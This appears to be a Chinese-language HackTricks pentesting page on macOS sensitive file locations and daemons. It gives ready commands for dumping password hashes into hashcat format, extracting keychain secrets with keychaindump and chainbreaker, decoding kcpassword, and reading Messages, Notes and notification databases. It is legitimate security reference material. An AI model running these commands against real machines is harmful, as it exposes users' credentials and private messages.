macOS 敏感位置与有趣的守护进程
Reading time: 14 minutes
tip
学习和实践 AWS 黑客技术:HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术:HackTricks Training GCP Red Team Expert (GRTE)
支持 HackTricks
- 查看 订阅计划!
- 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live.
- 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。
密码
隐藏密码
隐藏密码与用户的配置一起存储在位于 /var/db/dslocal/nodes/Default/users/
的 plist 文件中。
以下单行命令可用于转储 所有用户的信息(包括哈希信息):
for l in /var/db/dslocal/nodes/Default/users/*; do if [ -r "$l" ];then echo "$l"; defaults read "$l"; fi; done
像这样的脚本 或 这个 可以用来将哈希转换为 hashcat 格式。
一个替代的一行命令将以 hashcat 格式 -m 7100
(macOS PBKDF2-SHA512)转储所有非服务账户的凭据:
sudo bash -c 'for i in $(find /var/db/dslocal/nodes/Default/users -type f -regex "[^_]*"); do plutil -extract name.0 raw $i | awk "{printf \$0\":\$ml\$\"}"; for j in {iterations,salt,entropy}; do l=$(k=$(plutil -extract ShadowHashData.0 raw $i) && base64 -d <<< $k | plutil -extract SALTED-SHA512-PBKDF2.$j raw -); if [[ $j == iterations ]]; then echo -n $l; else base64 -d <<< $l | xxd -p -c 0 | awk "{printf \"$\"\$0}"; fi; done; echo ""; done'
另一种获取用户 ShadowHashData
的方法是使用 dscl
: sudo dscl . -read /Users/`whoami` ShadowHashData
/etc/master.passwd
此文件仅在系统以单用户模式运行时使用(因此不太频繁)。
Keychain Dump
请注意,当使用 security 二进制文件解密并转储密码时,会有几个提示要求用户允许此操作。
#security
security dump-trust-settings [-s] [-d] #List certificates
security list-keychains #List keychain dbs
security list-smartcards #List smartcards
security dump-keychain | grep -A 5 "keychain" | grep -v "version" #List keychains entries
security dump-keychain -d #Dump all the info, included secrets (the user will be asked for his password, even if root)
Keychaindump
caution
根据这个评论 juuso/keychaindump#10 (comment),这些工具在 Big Sur 中似乎不再有效。
Keychaindump 概述
一个名为 keychaindump 的工具被开发出来以从 macOS 钥匙串中提取密码,但在像 Big Sur 这样的较新 macOS 版本上面临限制,如 讨论 所示。使用 keychaindump 需要攻击者获得访问权限并提升到 root 权限。该工具利用了钥匙串在用户登录时默认解锁的事实,以方便应用程序访问,而无需用户重复输入密码。然而,如果用户选择在每次使用后锁定他们的钥匙串,keychaindump 将变得无效。
Keychaindump 通过针对一个特定的进程 securityd 来操作,Apple 将其描述为一个用于授权和加密操作的守护进程,对于访问钥匙串至关重要。提取过程涉及识别一个从用户登录密码派生的 Master Key。这个密钥对于读取钥匙串文件是必不可少的。为了找到 Master Key,keychaindump 使用 vmmap
命令扫描 securityd 的内存堆,寻找标记为 MALLOC_TINY
的区域中的潜在密钥。以下命令用于检查这些内存位置:
sudo vmmap <securityd PID> | grep MALLOC_TINY
在识别潜在的主密钥后,keychaindump 在堆中搜索特定模式 (0x0000000000000018
),这表明一个主密钥的候选者。进一步的步骤,包括去混淆,都是利用这个密钥所必需的,正如 keychaindump 的源代码中所概述的。专注于这一领域的分析师应注意,解密钥匙串的关键数据存储在 securityd 进程的内存中。运行 keychaindump 的示例命令是:
sudo ./keychaindump
chainbreaker
Chainbreaker 可用于以法医可靠的方式从 OSX 密钥链中提取以下类型的信息:
- 哈希密钥链密码,适合使用 hashcat 或 John the Ripper 破解
- 互联网密码
- 通用密码
- 私钥
- 公钥
- X509 证书
- 安全笔记
- Appleshare 密码
给定密钥链解锁密码、使用 volafox 或 volatility 获得的主密钥,或如 SystemKey 的解锁文件,Chainbreaker 还将提供明文密码。
如果没有这些解锁密钥链的方法,Chainbreaker 将显示所有其他可用信息。
Dump keychain keys
#Dump all keys of the keychain (without the passwords)
python2.7 chainbreaker.py --dump-all /Library/Keychains/System.keychain
使用 SystemKey 转储钥匙串密钥(带密码)
# First, get the keychain decryption key
# To get this decryption key you need to be root and SIP must be disabled
hexdump -s 8 -n 24 -e '1/1 "%.2x"' /var/db/SystemKey && echo
## Use the previous key to decrypt the passwords
python2.7 chainbreaker.py --dump-all --key 0293847570022761234562947e0bcd5bc04d196ad2345697 /Library/Keychains/System.keychain
转储钥匙串密钥(带密码)破解哈希
# Get the keychain hash
python2.7 chainbreaker.py --dump-keychain-password-hash /Library/Keychains/System.keychain
# Crack it with hashcat
hashcat.exe -m 23100 --keep-guessing hashes.txt dictionary.txt
# Use the key to decrypt the passwords
python2.7 chainbreaker.py --dump-all --key 0293847570022761234562947e0bcd5bc04d196ad2345697 /Library/Keychains/System.keychain
通过内存转储转储钥匙串密钥(带密码)
按照这些步骤 执行 内存转储
#Use volafox (https://github.com/n0fate/volafox) to extract possible keychain passwords
# Unformtunately volafox isn't working with the latest versions of MacOS
python vol.py -i ~/Desktop/show/macosxml.mem -o keychaindump
#Try to extract the passwords using the extracted keychain passwords
python2.7 chainbreaker.py --dump-all --key 0293847570022761234562947e0bcd5bc04d196ad2345697 /Library/Keychains/System.keychain
使用用户密码转储钥匙串密钥(包括密码)
如果您知道用户的密码,您可以使用它来转储和解密属于该用户的钥匙串。
#Prompt to ask for the password
python2.7 chainbreaker.py --dump-all --password-prompt /Users/<username>/Library/Keychains/login.keychain-db
kcpassword
kcpassword 文件是一个保存 用户登录密码 的文件,但只有在系统所有者 启用自动登录 的情况下。 因此,用户将自动登录,而无需输入密码(这并不是很安全)。
密码存储在文件 /etc/kcpassword
中,使用密钥 0x7D 0x89 0x52 0x23 0xD2 0xBC 0xDD 0xEA 0xA3 0xB9 0x1F
进行异或加密。 如果用户的密码长度超过密钥,密钥将被重复使用。
这使得密码相对容易恢复,例如使用像 这个 的脚本。
Interesting Information in Databases
Messages
sqlite3 $HOME/Library/Messages/chat.db .tables
sqlite3 $HOME/Library/Messages/chat.db 'select * from message'
sqlite3 $HOME/Library/Messages/chat.db 'select * from attachment'
sqlite3 $HOME/Library/Messages/chat.db 'select * from deleted_messages'
sqlite3 $HOME/Suggestions/snippets.db 'select * from emailSnippets'
通知
您可以在 $(getconf DARWIN_USER_DIR)/com.apple.notificationcenter/
找到通知数据。
大多数有趣的信息将位于 blob 中。因此,您需要 提取 该内容并 转换 为 人类 可读 格式,或者使用 strings
。要访问它,您可以执行:
cd $(getconf DARWIN_USER_DIR)/com.apple.notificationcenter/
strings $(getconf DARWIN_USER_DIR)/com.apple.notificationcenter/db2/db | grep -i -A4 slack
Notes
用户的 notes 可以在 ~/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite
找到
sqlite3 ~/Library/Group\ Containers/group.com.apple.notes/NoteStore.sqlite .tables
#To dump it in a readable format:
for i in $(sqlite3 ~/Library/Group\ Containers/group.com.apple.notes/NoteStore.sqlite "select Z_PK from ZICNOTEDATA;"); do sqlite3 ~/Library/Group\ Containers/group.com.apple.notes/NoteStore.sqlite "select writefile('body1.gz.z', ZDATA) from ZICNOTEDATA where Z_PK = '$i';"; zcat body1.gz.Z ; done
Preferences
在 macOS 应用中,偏好设置位于 $HOME/Library/Preferences
,而在 iOS 中则位于 /var/mobile/Containers/Data/Application/<UUID>/Library/Preferences
。
在 macOS 中,可以使用 cli 工具 defaults
来 修改偏好设置文件。
/usr/sbin/cfprefsd
声称 XPC 服务 com.apple.cfprefsd.daemon
和 com.apple.cfprefsd.agent
,并可以被调用以执行诸如修改偏好设置等操作。
OpenDirectory permissions.plist
文件 /System/Library/OpenDirectory/permissions.plist
包含应用于节点属性的权限,并受到 SIP 保护。
该文件通过 UUID(而不是 uid)授予特定用户权限,以便他们能够访问特定的敏感信息,如 ShadowHashData
、HeimdalSRPKey
和 KerberosKeys
等。
[...]
<key>dsRecTypeStandard:Computers</key>
<dict>
<key>dsAttrTypeNative:ShadowHashData</key>
<array>
<dict>
<!-- allow wheel even though it's implicit -->
<key>uuid</key>
<string>ABCDEFAB-CDEF-ABCD-EFAB-CDEF00000000</string>
<key>permissions</key>
<array>
<string>readattr</string>
<string>writeattr</string>
</array>
</dict>
</array>
<key>dsAttrTypeNative:KerberosKeys</key>
<array>
<dict>
<!-- allow wheel even though it's implicit -->
<key>uuid</key>
<string>ABCDEFAB-CDEF-ABCD-EFAB-CDEF00000000</string>
<key>permissions</key>
<array>
<string>readattr</string>
<string>writeattr</string>
</array>
</dict>
</array>
[...]
系统通知
Darwin 通知
主要的通知守护进程是 /usr/sbin/notifyd
。为了接收通知,客户端必须通过 com.apple.system.notification_center
Mach 端口进行注册(使用 sudo lsmp -p <pid notifyd>
检查它们)。该守护进程可以通过文件 /etc/notify.conf
进行配置。
用于通知的名称是唯一的反向 DNS 表示法,当向其中一个名称发送通知时,已指明可以处理该通知的客户端将接收到它。
可以通过向 notifyd 进程发送 SIGUSR2 信号并读取生成的文件 /var/run/notifyd_<pid>.status
来转储当前状态(并查看所有名称):
ps -ef | grep -i notifyd
0 376 1 0 15Mar24 ?? 27:40.97 /usr/sbin/notifyd
sudo kill -USR2 376
cat /var/run/notifyd_376.status
[...]
pid: 94379 memory 5 plain 0 port 0 file 0 signal 0 event 0 common 10
memory: com.apple.system.timezone
common: com.apple.analyticsd.running
common: com.apple.CFPreferences._domainsChangedExternally
common: com.apple.security.octagon.joined-with-bottle
[...]
分布式通知中心
分布式通知中心的主要二进制文件是**/usr/sbin/distnoted
**,这是发送通知的另一种方式。它暴露了一些XPC服务,并执行一些检查以尝试验证客户端。
苹果推送通知 (APN)
在这种情况下,应用程序可以注册主题。客户端将通过**apsd
联系苹果的服务器生成一个令牌。
然后,提供者也将生成一个令牌,并能够连接到苹果的服务器向客户端发送消息。这些消息将由apsd
**本地接收,并将通知转发给等待它的应用程序。
首选项位于/Library/Preferences/com.apple.apsd.plist
。
在macOS中,消息的本地数据库位于/Library/Application\ Support/ApplePushService/aps.db
,在iOS中位于/var/mobile/Library/ApplePushService
。它有3个表:incoming_messages
、outgoing_messages
和channel
。
sudo sqlite3 /Library/Application\ Support/ApplePushService/aps.db
也可以使用以下命令获取有关守护进程和连接的信息:
/System/Library/PrivateFrameworks/ApplePushService.framework/apsctl status
用户通知
这些是用户应该在屏幕上看到的通知:
CFUserNotification
:这个 API 提供了一种在屏幕上显示带有消息的弹出窗口的方法。- 公告板:这在 iOS 上显示一个会消失的横幅,并将存储在通知中心。
NSUserNotificationCenter
:这是 MacOS 中的 iOS 公告板。通知的数据库位于/var/folders/<user temp>/0/com.apple.notificationcenter/db2/db
tip
学习和实践 AWS 黑客技术:HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术:HackTricks Training GCP Red Team Expert (GRTE)
支持 HackTricks
- 查看 订阅计划!
- 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live.
- 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。